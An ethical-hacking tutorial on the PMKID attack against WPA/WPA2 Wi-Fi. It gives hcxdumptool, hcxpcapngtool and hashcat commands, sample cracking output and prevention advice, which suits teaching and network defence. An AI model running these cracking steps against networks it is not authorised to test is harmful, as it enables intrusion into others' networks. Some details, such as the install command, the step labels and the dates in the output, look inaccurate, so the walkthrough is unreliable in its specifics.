What is PMKID Attack on Wi-Fi Networks?

This ethical hacking guide explains what a PMKID attack is, how it works, the tools used and how to prevent such attacks on Wi-Fi networks in cyber security.

Understanding PMKID

PMKID stands for Pairwise Master Key Identifier. It is a component in the process of establishing a secure connection in Wi-Fi networks, particularly those using the WPA (Wi-Fi Protected Access) and WPA2 protocols. PMKID is part of the RSN (Robust Security Network) information element used during the process of 4-way handshake in WPA/WPA2.

What is a PMKID Attack?

A PMKID attack is a method used by attackers to exploit vulnerabilities in Wi-Fi networks, specifically those employing WPA2 (Wi-Fi Protected Access 2) security protocols. This attack targets the RSN (Robust Security Network) Information Element of the wireless communication to obtain the Pairwise Master Key Identifier (PMKID) which can then be used to derive the Pre-Shared Key (PSK), also known as the Wi-Fi password.

How PMKID Attack Works?

The PMKID attack was discovered by Jens ‘Atom’ Steube, the developer of the popular password cracking tool hashcat. Unlike other attacks such as the traditional WPA/WPA2 handshake capture attack, the PMKID attack does not require the attacker to capture a full four-way handshake or to wait for a user to connect or reconnect to the network.

Here’s a step-by-step breakdown of how the PMKID attack works:

1. Identify the Target Network: The attacker scans for available Wi-Fi networks and selects a target that uses WPA/WPA2 security.

2. Request PMKID from the AP: The attacker sends a request to the access point, which responds with the PMKID. This request is done using the RSNIE (Robust Security Network Information Element).

3. Capture the PMKID: The attacker captures the PMKID, which is included in the RSN Information Element of the first EAPOL (Extensible Authentication Protocol over LAN) frame during the authentication process.

4. Derive PMK from PMKID: The attacker then uses tools like hashcat to attempt to derive the PMK (Pairwise Master Key) from the PMKID. The process involves a dictionary or brute-force attack against the PMKID to find the Pre-Shared Key (PSK).

Example of a PMKID Attack

Let’s walk through a hypothetical scenario where an attacker uses a PMKID attack to crack a Wi-Fi network’s password.

Step-1: Setup

The attacker sets up their computer with the necessary tools:

1. A wireless network adapter capable of monitor mode.
2. hcxdumptool to capture PMKID.
3. hcxpcapngtool to convert captured PMKID to a format suitable for cracking.
4. Hashcat: Password cracking tool.

On a Linux-based system, you can install the tools using the following commands:

sudo apt-get update
sudo apt-get install hcxdumptool hcxpcapngtool hashcat

Step-2: Scan for Networks

Using a tool like hcxdumptool, the attacker scans for nearby Wi-Fi networks.

hcxdumptool -i wlan0 --enable_status=1 -o dumpfile.pcapng

Step-3: Capture PMKID

Once the target network is identified, the attacker captures the PMKID from the target AP.

hcxpcapngtool -o pmkidfile.16800 dumpfile.pcapng

Step-4: Crack the PMKID

The attacker uses hashcat to perform a dictionary attack on the captured PMKID to recover the Wi-Fi password.

hashcat -m 16800 pmkidfile.16800 wordlist.txt

Step-5: Gain Access

If the correct password is found, the attacker can then use it to connect to the Wi-Fi network.

Example Output

Hashcat will display the results if it successfully cracks the PSK. The output will look something like this:

hashcat (v6.x.x) starting...

OpenCL API (OpenCL 2.1 AMD-APP (3180.7)) - Platform #1 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #1: Radeon RX 580 Series, 8192/8192 MB (2048 MB allocatable), 36MCU

PMKID file 'pmkidfile.16800': Loaded 1 PMKID(s)

Hashmode: 16800 - WPA-PMKID-PBKDF2 (Iterations: 4096)

Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-PMKID-PBKDF2
Hash.Target......: pmkidfile.16800
Time.Started.....: Sat Jun 19 12:34:21 2024 (0 secs)
Time.Estimated...: Sat Jun 19 12:39:21 2024 (5 mins)
Guess.Base.......: File (wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   580.9 kH/s (0.58 MH/s)
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 0/13363426 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/13363426 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> password
Hardware.Mon.#1..: Temp: 50c Fan: 30% Util: 100% Core:1350MHz Mem:2000MHz Bus:16

Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-PMKID-PBKDF2
Hash.Target......: pmkidfile.16800
Time.Started.....: Sat Jun 19 12:34:21 2024 (1 min, 0 secs)
Time.Estimated...: Sat Jun 19 12:39:21 2024 (4 mins)
Guess.Base.......: File (wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   580.9 kH/s (0.58 MH/s)
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 3485736/13363426 (26.08%)
Rejected.........: 0/3485736 (0.00%)
Restore.Point....: 8192/13363426 (0.06%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: abc123 -> letmein
Hardware.Mon.#1..: Temp: 55c Fan: 35% Util: 100% Core:1350MHz Mem:2000MHz Bus:16

Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PMKID-PBKDF2
Hash.Target......: pmkidfile.16800
Time.Started.....: Sat Jun 19 12:34:21 2024 (5 mins, 0 secs)
Time.Estimated...: Sat Jun 19 12:39:21 2024 (0 secs)
Guess.Base.......: File (wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   580.9 kH/s (0.58 MH/s)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 13363426/13363426 (100.00%)
Rejected.........: 0/13363426 (0.00%)
Restore.Point....: 13363426/13363426 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: password123 -> letmein
Hardware.Mon.#1..: Temp: 60c Fan: 40% Util: 100% Core:1350MHz Mem:2000MHz Bus:16

Started: Sat Jun 19 12:34:21 2024
Stopped: Sat Jun 19 12:39:21 2024

Cracked Password: password123

Prevention and Mitigation

Given the simplicity and effectiveness of PMKID attacks, it’s essential to implement robust security measures to protect your Wi-Fi network. Here are several preventive measures:

• Use Strong Passwords: Ensure your Wi-Fi password is long, complex, and not based on common words or phrases. A mix of upper and lower case letters, numbers, and special characters is recommended.
• Update Firmware: Regularly update the firmware of your router to the latest version to patch any vulnerabilities that could be exploited by attackers.
• Enable WPA3: If available, upgrade your network to WPA3, which includes enhanced security features that protect against PMKID attacks.
• Use Enterprise Mode: If possible, use WPA2-Enterprise mode instead of WPA2-Personal. WPA2-Enterprise uses a RADIUS server for authentication, adding an extra layer of security.
• Disable WPS: Wi-Fi Protected Setup (WPS) is known to have vulnerabilities. Disabling it can reduce the attack surface of your network.
• Segmentation and Isolation: Use network segmentation and client isolation to limit the access an attacker would have if they were able to breach your network.

Conclusion

The PMKID attack highlights the importance of strong security measures in securing Wi-Fi networks. By understanding the attack mechanisms, implications, and preventive strategies, network administrators can strengthen their defenses against wireless hacking. While the PMKID attack exploits specific vulnerabilities in the WPA/WPA2 handshake process, adopting strong security practices and staying up to date with the latest protocols can significantly reduce the risks associated with this attack.